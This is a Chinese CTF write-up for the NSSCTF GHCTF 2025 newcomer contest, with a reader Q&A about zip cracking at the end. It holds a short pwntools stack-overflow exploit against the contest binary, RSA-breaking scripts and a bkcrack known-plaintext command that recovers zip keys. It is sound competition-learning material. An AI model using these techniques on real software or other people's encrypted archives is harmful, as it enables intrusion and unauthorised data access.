霍雅
NSSCTF GHCTF 2025 新生赛(公开赛道) 部分wp
最终排名129/802(只计算有分的战队)
因为没有web手,一个pwn和一个流量是我队友做的
reverse
ASM?Signin!
来检验一下你的8086汇编基础吧!回顾或许能找到更好的方式。
详见https://www.huoya.work/bk/index.php/archives/157/
PWN
Hello_world
Welcome come to the world of PWN
简单栈溢出
有shellcode
直接构造payload
from pwn import *
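# Target selection: the remote endpoint stays commented out, as in the
# write-up, so the script runs against the local binary.
#p = remote("node2.anna.nssctf.cn",28826)
p = process("./attachment")

# Filler length, 0x20 + 8 bytes (presumably the buffer plus the saved frame
# pointer -- confirm against the binary). The original defined this value but
# then repeated it as a bare 0x28 in the send call.
padding = 0x20 + 8

# Only two bytes follow the filler, so the rest of whatever sits after it on
# the stack keeps its existing value. NOTE(review): this looks like a partial
# overwrite of the saved return address -- confirm against the binary.
back = b'\xc5\x09'

p.send(b'a' * padding + back)
p.interactive()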
crypto
baby_factor
给了e n phi c 直接算d
from Crypto.Util.number import *
def create():
    """Return three freshly generated 1024-bit primes in ascending order."""
    return sorted(getPrime(1024) for _ in range(3))
# Three-prime RSA instance: n = p*q*r with the usual public exponent.
e = 65537
m = b'NSSCTF{xxx}'
pl = create()
p, q, r = pl
n = p * q * r
phi = (p - 1) * (q - 1) * (r - 1)
c = pow(bytes_to_long(m), e, n)

# phi is printed next to n and c. Anyone holding phi can invert e modulo phi,
# so the ciphertext offers no confidentiality; phi must stay private in any
# real deployment.
for label, value in (('n', n), ('phi', phi), ('c', c)):
    print(f'{label}={value}')
"""
n=2741832985459799195551463586200496171706401045582705736390510500694289553647578857170635209048629428396407631873312962021354740290808869502374444435394061448767702908255197762575345798570340246369827688321483639197634802985398882606068294663625992927239602442735647762662536456784313240499437659967114509197846086151042512153782486075793224874304872205720564733574010669935992016367832666397263951446340260962650378484847385424893514879629196181114844346169851383460163815147712907264437435463059397586675769959094397311450861780912636566993749356097243760640620004707428340786147078475120876426087835327094386842765660642186546472260607586011343238080538092580452700406255443887820337778505999803772196923996033929998741437250238302626841957729397241851219567703420968177784088484002831289722211924810899441563382481216744212304879717297444824808184727136770899310815544776369231934774967139834384853322157766059825736075553
phi=2741832985459799195551463586200496171706401045582705736390510500694289553647578857170635209048629428396407631873312962021354740290808869502374444435394061448767702908255197762575345798570340246369827688321483639197634802985398882606068294663625992927239602442735647762662536456784313240499437659967114509197784246608456057052779643060628984335578973450260519106769911425793594847759982583376628098472390090331415895352869275325656949958242181688663465437185437198392460569653734315961071709533645370007008616755547195108861900432818710027794402838336405197750190466425895582236209479543326147804766393022786785337752319686125574507066082357748118175068545756301823381723776525427724798780890160482013759497102382173931716030992837059880049832065500252713739288235410544982532170147652055063681116147027591678349638753796122845041417275362394757384204924094885233281257928031484806977974575497621444483701792085077113227851520
c=2675023626005191241628571734421094007494866451142251352071850033504791090546156004348738217761733467156596330653396106482342801412567035848069931148880296036606611571818493841795682186933874790388789734748415540102210757974884805905578650801916130709273985096229857987312816790471330181166965876955546627327549473645830218664078284830699777113214559053294592015697007540297033755845037866295098660371843447432672454589238297647906075964139778749351627739005675106752803394387612753005638224496040203274119150075266870378506841838513636541340104864561937527329845541975189814018246183215952285198950920021711141273569490277643382722047159198943471946774301837440950402563578645113393610924438585345876355654972759318203702572517614743063464534582417760958462550905093489838646250677941813170355212088529993225869303917882372480469839803533981671743959732373159808299457374754090436951368378994871937358645247263240789585351233
"""
exp如下:NSSCTF{W0W!!_Y0u_4r3_g00d_G03!!!}
import gmpy2
import libnum
# Public exponent used by the challenge script.
e=65537
# n, phi and c are left blank on purpose: paste the values printed by the
# challenge (they are too long to show readably here).
n=
phi=
c=
# phi was published, so the private exponent is simply e^-1 mod phi.
d = gmpy2.invert(e, phi)
# Textbook RSA decryption, then integer -> bytes to print the flag.
m=pow(c,d,n)
print(libnum.n2s(int(m)))
baby_signin
import libnum
from Crypto.Util.number import getPrime, bytes_to_long
# Toy RSA-style instance: two 128-bit primes, both of which are printed below.
p = getPrime(128)
q = getPrime(128)
n = p * q
phi = (p - 1) * (q - 1)  # computed but never used in this script

flag = "NSSCTF{xxxxxx}"
m = bytes_to_long(flag.encode())

# e = 4 shares a factor with phi (p - 1 and q - 1 are both even), so no
# decryption exponent d exists; recovering m means taking 4th roots mod p, q.
e = 4
c = pow(m, e, n)

# Same output order and format as before: p, q, c, n.
for label, value in (("p=", p), ("q=", q), ("c=", c), ("n=", n)):
    print(label, value)
'''
e=4
p= 182756071972245688517047475576147877841
q= 305364532854935080710443995362714630091
c= 14745090428909283741632702934793176175157287000845660394920203837824364163635
n= 55807222544207698804941555841826949089076269327839468775219849408812970713531
'''
# Decodes a hard-coded integer to bytes and prints it; what it spells and why
# it is part of the challenge file are not explained on the page.
print(libnum.n2s(11019499260328699572))
e=4,RSA常规解法的条件是:1<e<phi_n,且e与phi_n互质(e通常取质数)。这里p-1和q-1都是偶数,e=4与phi_n不互质,所以私钥d不存在
所以常规解不行,尝试了e约去公约数、CRT、AMM都无法解出
最后是在模q和p下分别求四次方根,再用CRT合并
exp如下:NSSCTF{4MM_1s_so_e4s7!}
from sympy.ntheory.modular import crt
from sympy.ntheory.residue_ntheory import sqrt_mod
# Known parameters, copied from the challenge output (both primes are given).
p = 182756071972245688517047475576147877841
q = 305364532854935080710443995362714630091
n = p * q
c = 14745090428909283741632702934793176175157287000845660394920203837824364163635
def fourth_roots(modulus, c):
    """Collect the x with x**4 == c (mod modulus) via two rounds of square roots.

    Every square root r of c is itself square-rooted; the union of those
    second-level roots is returned as a list without duplicates (in set order).
    The callers on this page pass a prime modulus.
    """
    found = set()
    # First layer: all r with r^2 = c (mod modulus).
    for r in sqrt_mod(c, modulus, all_roots=True):
        # Second layer: all s with s^2 = r (mod modulus).
        try:
            found.update(sqrt_mod(r, modulus, all_roots=True))
        except Exception:
            # No usable square root for this r; move on to the next one.
            continue
    return list(found)
# All fourth roots of c modulo each prime factor.
roots_p = fourth_roots(p, c % p)
roots_q = fourth_roots(q, c % q)

# Pair every root mod p with every root mod q and lift the pair to a single
# residue mod n with the CRT; crt() returns (value, modulus), keep the value.
candidates = [
    crt([p, q], [rp, rq])[0]
    for rp in roots_p
    for rq in roots_q
]
# Decode each candidate as big-endian bytes and print the ones shaped like
# NSSCTF{...}; only one of the lifted roots is the real plaintext.
for cand in candidates:
    try:
        byte_len = (cand.bit_length() + 7) // 8
        m_bytes = cand.to_bytes(byte_len, 'big')
        looks_like_flag = m_bytes.startswith(b'NSSCTF{') and m_bytes.endswith(b'}')
        if looks_like_flag:
            print("Flag:", m_bytes)
    except Exception:
        # Candidates that cannot be converted are skipped.
        continue
EZ_Fermat
看起来像求解离散对数?但其实不是的!
代码如下
from Crypto.Util.number import getPrime, bytes_to_long
from secret import f
# Plain two-prime RSA: the flag is encrypted under (n, e).
flag = b'NSSCTF{test_flag}'
p = getPrime(512)
q = getPrime(512)
n = p*q
m = bytes_to_long(flag)
e = 65537
c = pow(m,e,n)
# Sage syntax: R is the polynomial ring ZZ[x]. The secret polynomial imported
# as f is re-parsed from its string form into an element of R.
R.<x> = ZZ[]
f = R(str(f))
# Extra value handed to the solver: 2 raised to f evaluated at the secret
# prime p, reduced mod n. This ties a published number to p.
w = pow(2,f(p),n)
# n, e, c, the polynomial f and w are all printed.
print(f'{n = }\n')
print(f'{e = }\n')
print(f'{c = }\n')
print(f'{f = }\n')
print(f'{w = }\n')
'''
n = 101780569941880865465631942473186578520071435753163950944409148606282910806650879176280021512435190682009749926285674412651435782567149633130455645157688819845748439487113261739503325065997835517112163014056297017874761742768297646567397770742374004940360061700285170103292360590891188591132054903101398360047
e = 65537
c = 77538275949900942020886849496162539665323546686749270705418870515132296087721218282974435210763225488530925782158331269160555819622551413648073293857866671421886753377970220838141826468831099375757481041897142546760492813343115244448184595644585857978116766199800311200819967057790401213156560742779242511746
f = 2*x^332 - x^331 + x^329 + 3*x^328 - x^327 - 3*x^325 + x^323 - 3*x^322 - x^321 - 3*x^320 + x^319 + 2*x^318 - 4*x^317 - 3*x^315 - 2*x^314 + x^313 + x^312 + 2*x^311 + 2*x^309 + 2*x^308 + 5*x^307 + 2*x^306 + 3*x^305 + 5*x^304 + 4*x^303 + x^302 - x^301 - x^300 - 2*x^299 - 2*x^298 + x^297 + 3*x^296 - x^295 - 4*x^292 - x^290 + 4*x^289 - x^287 - 3*x^286 + x^285 - 2*x^284 + x^283 - x^282 - 2*x^281 + x^280 - 2*x^279 + x^278 + 2*x^277 - 3*x^276 - x^275 - 4*x^274 - 3*x^273 - 5*x^272 - 2*x^271 - 3*x^270 + 2*x^269 + 2*x^268 - x^267 - 2*x^266 + x^265 + x^264 - 3*x^262 - 3*x^259 + 2*x^258 - x^257 + 2*x^256 + 2*x^255 - x^254 - 2*x^253 - x^252 + 2*x^251 - x^250 + x^249 + 2*x^247 + 2*x^246 + 2*x^245 - 2*x^244 - 3*x^243 + 2*x^242 - 3*x^241 - x^240 - 3*x^239 - x^236 - 3*x^235 - 2*x^234 - x^233 - 2*x^232 - x^231 - 3*x^230 - 2*x^229 - 4*x^228 - 2*x^227 - 3*x^226 + 2*x^225 + x^224 - x^223 - 2*x^221 + 3*x^219 - x^217 - 2*x^216 + x^215 + 2*x^213 - x^212 + 3*x^211 + x^210 + 4*x^209 + x^208 - x^206 - x^205 - x^204 + 2*x^203 - 3*x^202 + 2*x^199 - x^198 + 2*x^196 - 2*x^195 + 3*x^194 + 3*x^193 - x^192 + 4*x^191 + 2*x^189 + x^186 - x^185 - x^184 + 3*x^183 + x^182 + 2*x^181 - 2*x^180 + x^177 + x^175 - x^173 + 3*x^172 + x^170 + x^169 - x^167 - 2*x^166 - x^165 - 4*x^164 - 2*x^163 + 2*x^162 + 4*x^161 - 2*x^160 - 3*x^159 - 2*x^158 - 2*x^157 + x^156 - x^155 + 3*x^154 - 4*x^153 + x^151 + 2*x^150 + x^149 - x^148 + 2*x^147 + 3*x^146 + 2*x^145 - 4*x^144 - 4*x^143 + x^142 - 2*x^140 - 2*x^139 + 2*x^138 + 3*x^137 + 3*x^136 + 3*x^135 + x^134 - x^133 + 2*x^132 + 3*x^130 - 3*x^129 - 2*x^128 - x^127 - 2*x^126 + x^125 + x^124 - 2*x^123 + x^122 - x^121 + 3*x^120 - x^119 - 2*x^118 - x^117 - x^116 - 2*x^115 + 2*x^114 + 2*x^113 - 3*x^112 - x^111 - 4*x^110 + x^109 + x^108 + x^106 - 4*x^105 + x^104 - x^103 - x^101 + x^100 - 2*x^99 + x^98 - x^97 + 3*x^96 + 3*x^94 - x^93 - x^92 + x^91 - 2*x^90 + x^89 - x^88 + x^87 - x^86 + x^85 + x^84 - x^83 + x^79 - 3*x^78 - 2*x^77 + x^74 + 3*x^73 - x^72 - 3*x^71 - 2*x^70 + x^69 - 
3*x^66 + x^65 + x^64 - 4*x^62 - x^61 + x^60 - x^59 + 3*x^58 - x^57 - x^54 + 3*x^53 + x^51 - 3*x^50 - x^49 + 2*x^47 - x^46 - x^44 + x^43 - x^42 - 4*x^41 - 3*x^39 - x^37 - x^36 - 3*x^35 + x^34 + x^33 - 2*x^32 + 2*x^31 - x^30 + 2*x^29 - 2*x^28 - 2*x^27 - x^24 + x^22 - 5*x^21 + 3*x^20 + 2*x^19 - x^18 + 2*x^17 + x^16 - 2*x^15 - 2*x^14 + x^13 + x^12 + 2*x^11 - 3*x^10 + 3*x^9 + 2*x^8 - 4*x^6 - 2*x^5 - 4*x^4 + x^3 - x^2 - 1
w = 32824596080441735190523997982799829197530203904568086251690542244969244071312854874746142497647579310192994177896837383837384405062036521829088599595750902976191010000575697075792720479387771945760107268598283406893094243282498381006464103080551366587157561686900620059394693185990788592220509670478190685244
'''
为了解这个CTF密码题,我们需要利用给定的多项式f和计算结果w来分解RSA模数n。以下是详细步骤和Python解决方案:
方法思路
分析多项式:计算多项式f在x=1处的值,即f(1)。这个值是所有系数的代数和。
模运算转换:由于p ≡ 1 (mod p-1),对任意k都有p^k ≡ 1 (mod p-1),所以f(p) ≡ f(1) (mod p-1);再利用费马小定理2^(p-1) ≡ 1 (mod p),将w = 2^f(p) mod n转换为模p下的表达式,即w ≡ 2^f(1) mod p。
分解n:通过计算gcd(n, w - 2^f(1) mod n)来找到n的一个因子p或q。
解密RSA:使用分解后的p和q计算私钥d,解密密文c得到明文m。
exp如下:NSSCTF{8d1e3405044a79b23a44a43084bd994b}
import re
import math
from Crypto.Util.number import long_to_bytes
n = 101780569941880865465631942473186578520071435753163950944409148606282910806650879176280021512435190682009749926285674412651435782567149633130455645157688819845748439487113261739503325065997835517112163014056297017874761742768297646567397770742374004940360061700285170103292360590891188591132054903101398360047
e = 65537
c = 77538275949900942020886849496162539665323546686749270705418870515132296087721218282974435210763225488530925782158331269160555819622551413648073293857866671421886753377970220838141826468831099375757481041897142546760492813343115244448184595644585857978116766199800311200819967057790401213156560742779242511746
w = 32824596080441735190523997982799829197530203904568086251690542244969244071312854874746142497647579310192994177896837383837384405062036521829088599595750902976191010000575697075792720479387771945760107268598283406893094243282498381006464103080551366587157561686900620059394693185990788592220509670478190685244
f_str = "2*x^332 - x^331 + x^329 + 3*x^328 - x^327 - 3*x^325 + x^323 - 3*x^322 - x^321 - 3*x^320 + x^319 + 2*x^318 - 4*x^317 - 3*x^315 - 2*x^314 + x^313 + x^312 + 2*x^311 + 2*x^309 + 2*x^308 + 5*x^307 + 2*x^306 + 3*x^305 + 5*x^304 + 4*x^303 + x^302 - x^301 - x^300 - 2*x^299 - 2*x^298 + x^297 + 3*x^296 - x^295 - 4*x^292 - x^290 + 4*x^289 - x^287 - 3*x^286 + x^285 - 2*x^284 + x^283 - x^282 - 2*x^281 + x^280 - 2*x^279 + x^278 + 2*x^277 - 3*x^276 - x^275 - 4*x^274 - 3*x^273 - 5*x^272 - 2*x^271 - 3*x^270 + 2*x^269 + 2*x^268 - x^267 - 2*x^266 + x^265 + x^264 - 3*x^262 - 3*x^259 + 2*x^258 - x^257 + 2*x^256 + 2*x^255 - x^254 - 2*x^253 - x^252 + 2*x^251 - x^250 + x^249 + 2*x^247 + 2*x^246 + 2*x^245 - 2*x^244 - 3*x^243 + 2*x^242 - 3*x^241 - x^240 - 3*x^239 - x^236 - 3*x^235 - 2*x^234 - x^233 - 2*x^232 - x^231 - 3*x^230 - 2*x^229 - 4*x^228 - 2*x^227 - 3*x^226 + 2*x^225 + x^224 - x^223 - 2*x^221 + 3*x^219 - x^217 - 2*x^216 + x^215 + 2*x^213 - x^212 + 3*x^211 + x^210 + 4*x^209 + x^208 - x^206 - x^205 - x^204 + 2*x^203 - 3*x^202 + 2*x^199 - x^198 + 2*x^196 - 2*x^195 + 3*x^194 + 3*x^193 - x^192 + 4*x^191 + 2*x^189 + x^186 - x^185 - x^184 + 3*x^183 + x^182 + 2*x^181 - 2*x^180 + x^177 + x^175 - x^173 + 3*x^172 + x^170 + x^169 - x^167 - 2*x^166 - x^165 - 4*x^164 - 2*x^163 + 2*x^162 + 4*x^161 - 2*x^160 - 3*x^159 - 2*x^158 - 2*x^157 + x^156 - x^155 + 3*x^154 - 4*x^153 + x^151 + 2*x^150 + x^149 - x^148 + 2*x^147 + 3*x^146 + 2*x^145 - 4*x^144 - 4*x^143 + x^142 - 2*x^140 - 2*x^139 + 2*x^138 + 3*x^137 + 3*x^136 + 3*x^135 + x^134 - x^133 + 2*x^132 + 3*x^130 - 3*x^129 - 2*x^128 - x^127 - 2*x^126 + x^125 + x^124 - 2*x^123 + x^122 - x^121 + 3*x^120 - x^119 - 2*x^118 - x^117 - x^116 - 2*x^115 + 2*x^114 + 2*x^113 - 3*x^112 - x^111 - 4*x^110 + x^109 + x^108 + x^106 - 4*x^105 + x^104 - x^103 - x^101 + x^100 - 2*x^99 + x^98 - x^97 + 3*x^96 + 3*x^94 - x^93 - x^92 + x^91 - 2*x^90 + x^89 - x^88 + x^87 - x^86 + x^85 + x^84 - x^83 + x^79 - 3*x^78 - 2*x^77 + x^74 + 3*x^73 - x^72 - 3*x^71 - 2*x^70 + x^69 
- 3*x^66 + x^65 + x^64 - 4*x^62 - x^61 + x^60 - x^59 + 3*x^58 - x^57 - x^54 + 3*x^53 + x^51 - 3*x^50 - x^49 + 2*x^47 - x^46 - x^44 + x^43 - x^42 - 4*x^41 - 3*x^39 - x^37 - x^36 - 3*x^35 + x^34 + x^33 - 2*x^32 + 2*x^31 - x^30 + 2*x^29 - 2*x^28 - 2*x^27 - x^24 + x^22 - 5*x^21 + 3*x^20 + 2*x^19 - x^18 + 2*x^17 + x^16 - 2*x^15 - 2*x^14 + x^13 + x^12 + 2*x^11 - 3*x^10 + 3*x^9 + 2*x^8 - 4*x^6 - 2*x^5 - 4*x^4 + x^3 - x^2 - 1"
# Normalise the text so every term reads "[sign][coeff][x^k]": no spaces, no '*'.
f_str = f_str.replace(' ', '').replace('*', '')
# One match per signed term.
terms = re.findall(r'([+-]?[^+-]+)', f_str)

# f(1) is the sum of the coefficients, so the exponents are ignored entirely.
sum_coeff = 0
for raw_term in terms:
    body = raw_term.strip()
    if not body:
        continue
    negative = body[0] == '-'
    if body[0] in '+-':
        body = body[1:]
    if 'x' in body:
        # Text before the first 'x' is the coefficient; empty means an implicit 1.
        digits = body.split('x', 1)[0]
        magnitude = int(digits) if digits else 1
    elif body:
        # Constant term.
        magnitude = int(body)
    else:
        # A bare sign with nothing after it; the regex above never yields one.
        continue
    sum_coeff += -magnitude if negative else magnitude

print(f"Sum of coefficients (f(1)): {sum_coeff}")
# t = 2^f(1) mod n. Three-argument pow accepts a negative exponent (it inverts
# the base modulo n first), so the sum_coeff < 0 case needs no separate branch.
t = pow(2, sum_coeff, n)

# w and t agree modulo p, so their difference shares the factor p with n.
k = (w - t) % n
p = math.gcd(n, k)
if p in (1, n):
    print("Failed to factor n")
    exit()
q = n // p
print(f"Successfully factored n: p = {p}\nq = {q}")

# With both primes known, rebuild the private exponent and decrypt.
phi = (p - 1) * (q - 1)
d = pow(e, -1, phi)
m = pow(c, d, n)
flag = long_to_bytes(m)
print(f"Decrypted flag: {flag}")
MISC
mybrave
使用了常规方法,伪加密、爆破、binwalk等都没用
使用bkcrack明文攻击
具体用法,查看这篇文章的下半部分
https://www.huoya.work/bk/index.php/archives/122/
压缩包解出来是一个图片,用010打开到末尾有一段base64编码,解码得flag
mycode
一个简单的算法练手题
题目描述:
我会给N个数字,每个数字不超过6位,你需要拼接这N个数字,使你最后拼接的这个数最小。在100s内连续无误解决100个问题即可获得flag。
2 <= N <= 100
Numbers: 6 33 432 0018 98 02
Smallest: (Your Input)
Smallest: 180233432698
通过nc访问靶场,可以看到给了一串数字,也可以看到输入正确能得到Correct!,但是限时100s内解决100个问题,所以手解是不可能的,写脚本
通过简单脚本实现 NSSCTF{021ec566-0257-45e8-ad3e-6347fcbdf62b}
exp如下
from functools import cmp_to_key
import socket
import time
def smallest_concatenated_number(nums):
    """Return the smallest number obtainable by concatenating all of *nums*.

    Items are compared as strings: a goes before b when a+b sorts below b+a.
    Leading zeros are stripped from the joined result, and an empty or
    all-zero result is reported as '0'.
    """
    def _order(left, right):
        # sorted() only asks "is left < right", so -1 / 1 is sufficient.
        if left + right < right + left:
            return -1
        return 1

    pieces = [str(item) for item in nums]
    pieces.sort(key=cmp_to_key(_order))
    joined = ''.join(pieces).lstrip('0')
    return joined or '0'
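def connect_and_solve(host, port):
    """Answer the server's "smallest concatenation" prompts until a flag shows up.

    Connects to (host, port) over TCP, reads each prompt, takes the
    whitespace-separated tokens after "Numbers:", and sends back the result of
    smallest_concatenated_number() followed by a newline. Stops after 101
    reads, when a flag marker is seen, or when the peer closes the connection.

    Args:
        host: server host name or address.
        port: server TCP port.
    """
    # The write-up's flag is printed as NSSCTF{...}; the original only looked
    # for "flag{", which that format never contains. Both are accepted here.
    flag_markers = ("flag{", "NSSCTF{")
    stop_tokens = (b"Numbers:", b"Correct!", b"Wrong Answer!") + tuple(
        marker.encode() for marker in flag_markers
    )

    # create_connection applies the timeout to connect() as well, and the
    # with-block closes the socket even if parsing or sending raises.
    with socket.create_connection((host, port), timeout=10) as s:
        answer_count = 0

        for _ in range(101):
            # Read until a known prompt/verdict token is present in the buffer.
            data = b""
            peer_closed = False
            while True:
                try:
                    chunk = s.recv(4096)
                except socket.timeout:
                    print("[ERROR] 接收超时,已接收数据:", repr(data))
                    break
                if not chunk:
                    peer_closed = True
                    break
                data += chunk
                if any(token in data for token in stop_tokens):
                    break

            # Bytes from the peer are untrusted; a malformed sequence must not
            # abort the run with UnicodeDecodeError.
            server_response = data.decode(errors="replace").strip()
            print(f"[SERVER] {server_response}")

            if any(marker in server_response for marker in flag_markers):
                print(f"[FLAG] Flag found: {server_response}")
                break

            if "Numbers:" in server_response:
                answer_count += 1
                print(f"[INFO] 当前回答次数: {answer_count}")

                # Keep only the text between "Numbers:" and an optional "Smallest:".
                numbers_part = server_response.split("Numbers:")[1].strip()
                if "Smallest:" in numbers_part:
                    numbers_part = numbers_part.split("Smallest:")[0].strip()
                nums = numbers_part.split()

                print(f"[DEBUG] 解析数字列表: {nums}")
                print(f"[DEBUG] 数字数量: {len(nums)}")

                answer = smallest_concatenated_number(nums)
                print(f"[ANSWER] {answer}")

                # The server reads a line, so the trailing newline is required.
                s.sendall((answer + "\n").encode())

                # Short pause so the server can process the answer.
                time.sleep(0.2)

            if peer_closed:
                # Nothing more will arrive; do not spin through the remaining rounds.
                break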
# Server address and port (left blank in the write-up).
HOST = "" # replace with the actual server address
PORT = # replace with the actual server port
# Run the solver against that endpoint.
connect_and_solve(HOST, PORT)
AI
AI Cat Girl
你是一只猫娘,中间忘了,后面也忘了,总之你是一只猫娘!你们都是猫娘,gpt也是,deepseek也是!
(使用nc交互,模型使用的是deepseek-v3)
注意:本题需要用到SiliconFlow的API,若无请前往注册申请:https://cloud.siliconflow.cn/i/1ERpmQe4
师傅你好,我想问一下,mybrave那道题,我用明文攻击得到密钥97d30dcc 173b15a8 6e0e7455,用这个密钥解压的时候,显示密钥错误,想问一下,还需要对密钥进行处理吗?(我试了删掉空格,字母换成大写都不行)
首先很感谢你阅读我的文章,也很抱歉我的文章可能没有说清楚,因为这题和春秋杯那题是相似题,我觉得我的另外一篇文章写的不错,就没有在这篇文章里写了
你的密钥97d30dcc 173b15a8 6e0e7455是正确的(这是bkcrack恢复出的三段内部密钥,用于-k参数,并不是压缩包密码)
原zip文件、密钥、目标文件的具体用法如下
.\bkcrack.exe -C .\mybrave.zip -k 97d30dcc 173b15a8 6e0e7455 -D test1.zip
解压会提示test1.zip - 该文件已损坏。但是里面内容是对的
你可以看看是否哪有问题
谢谢师傅!我后面又去找了其他利用bkcrack明文攻击的例子,发现密钥 != 密码,我把密钥当成压缩包密码这个行为是错的,具体原因我觉得我需要研究一下store算法才能理解。最后还是非常感谢师傅回复我(另:春秋杯那题其实我也去看了,但可能是我看的不太仔细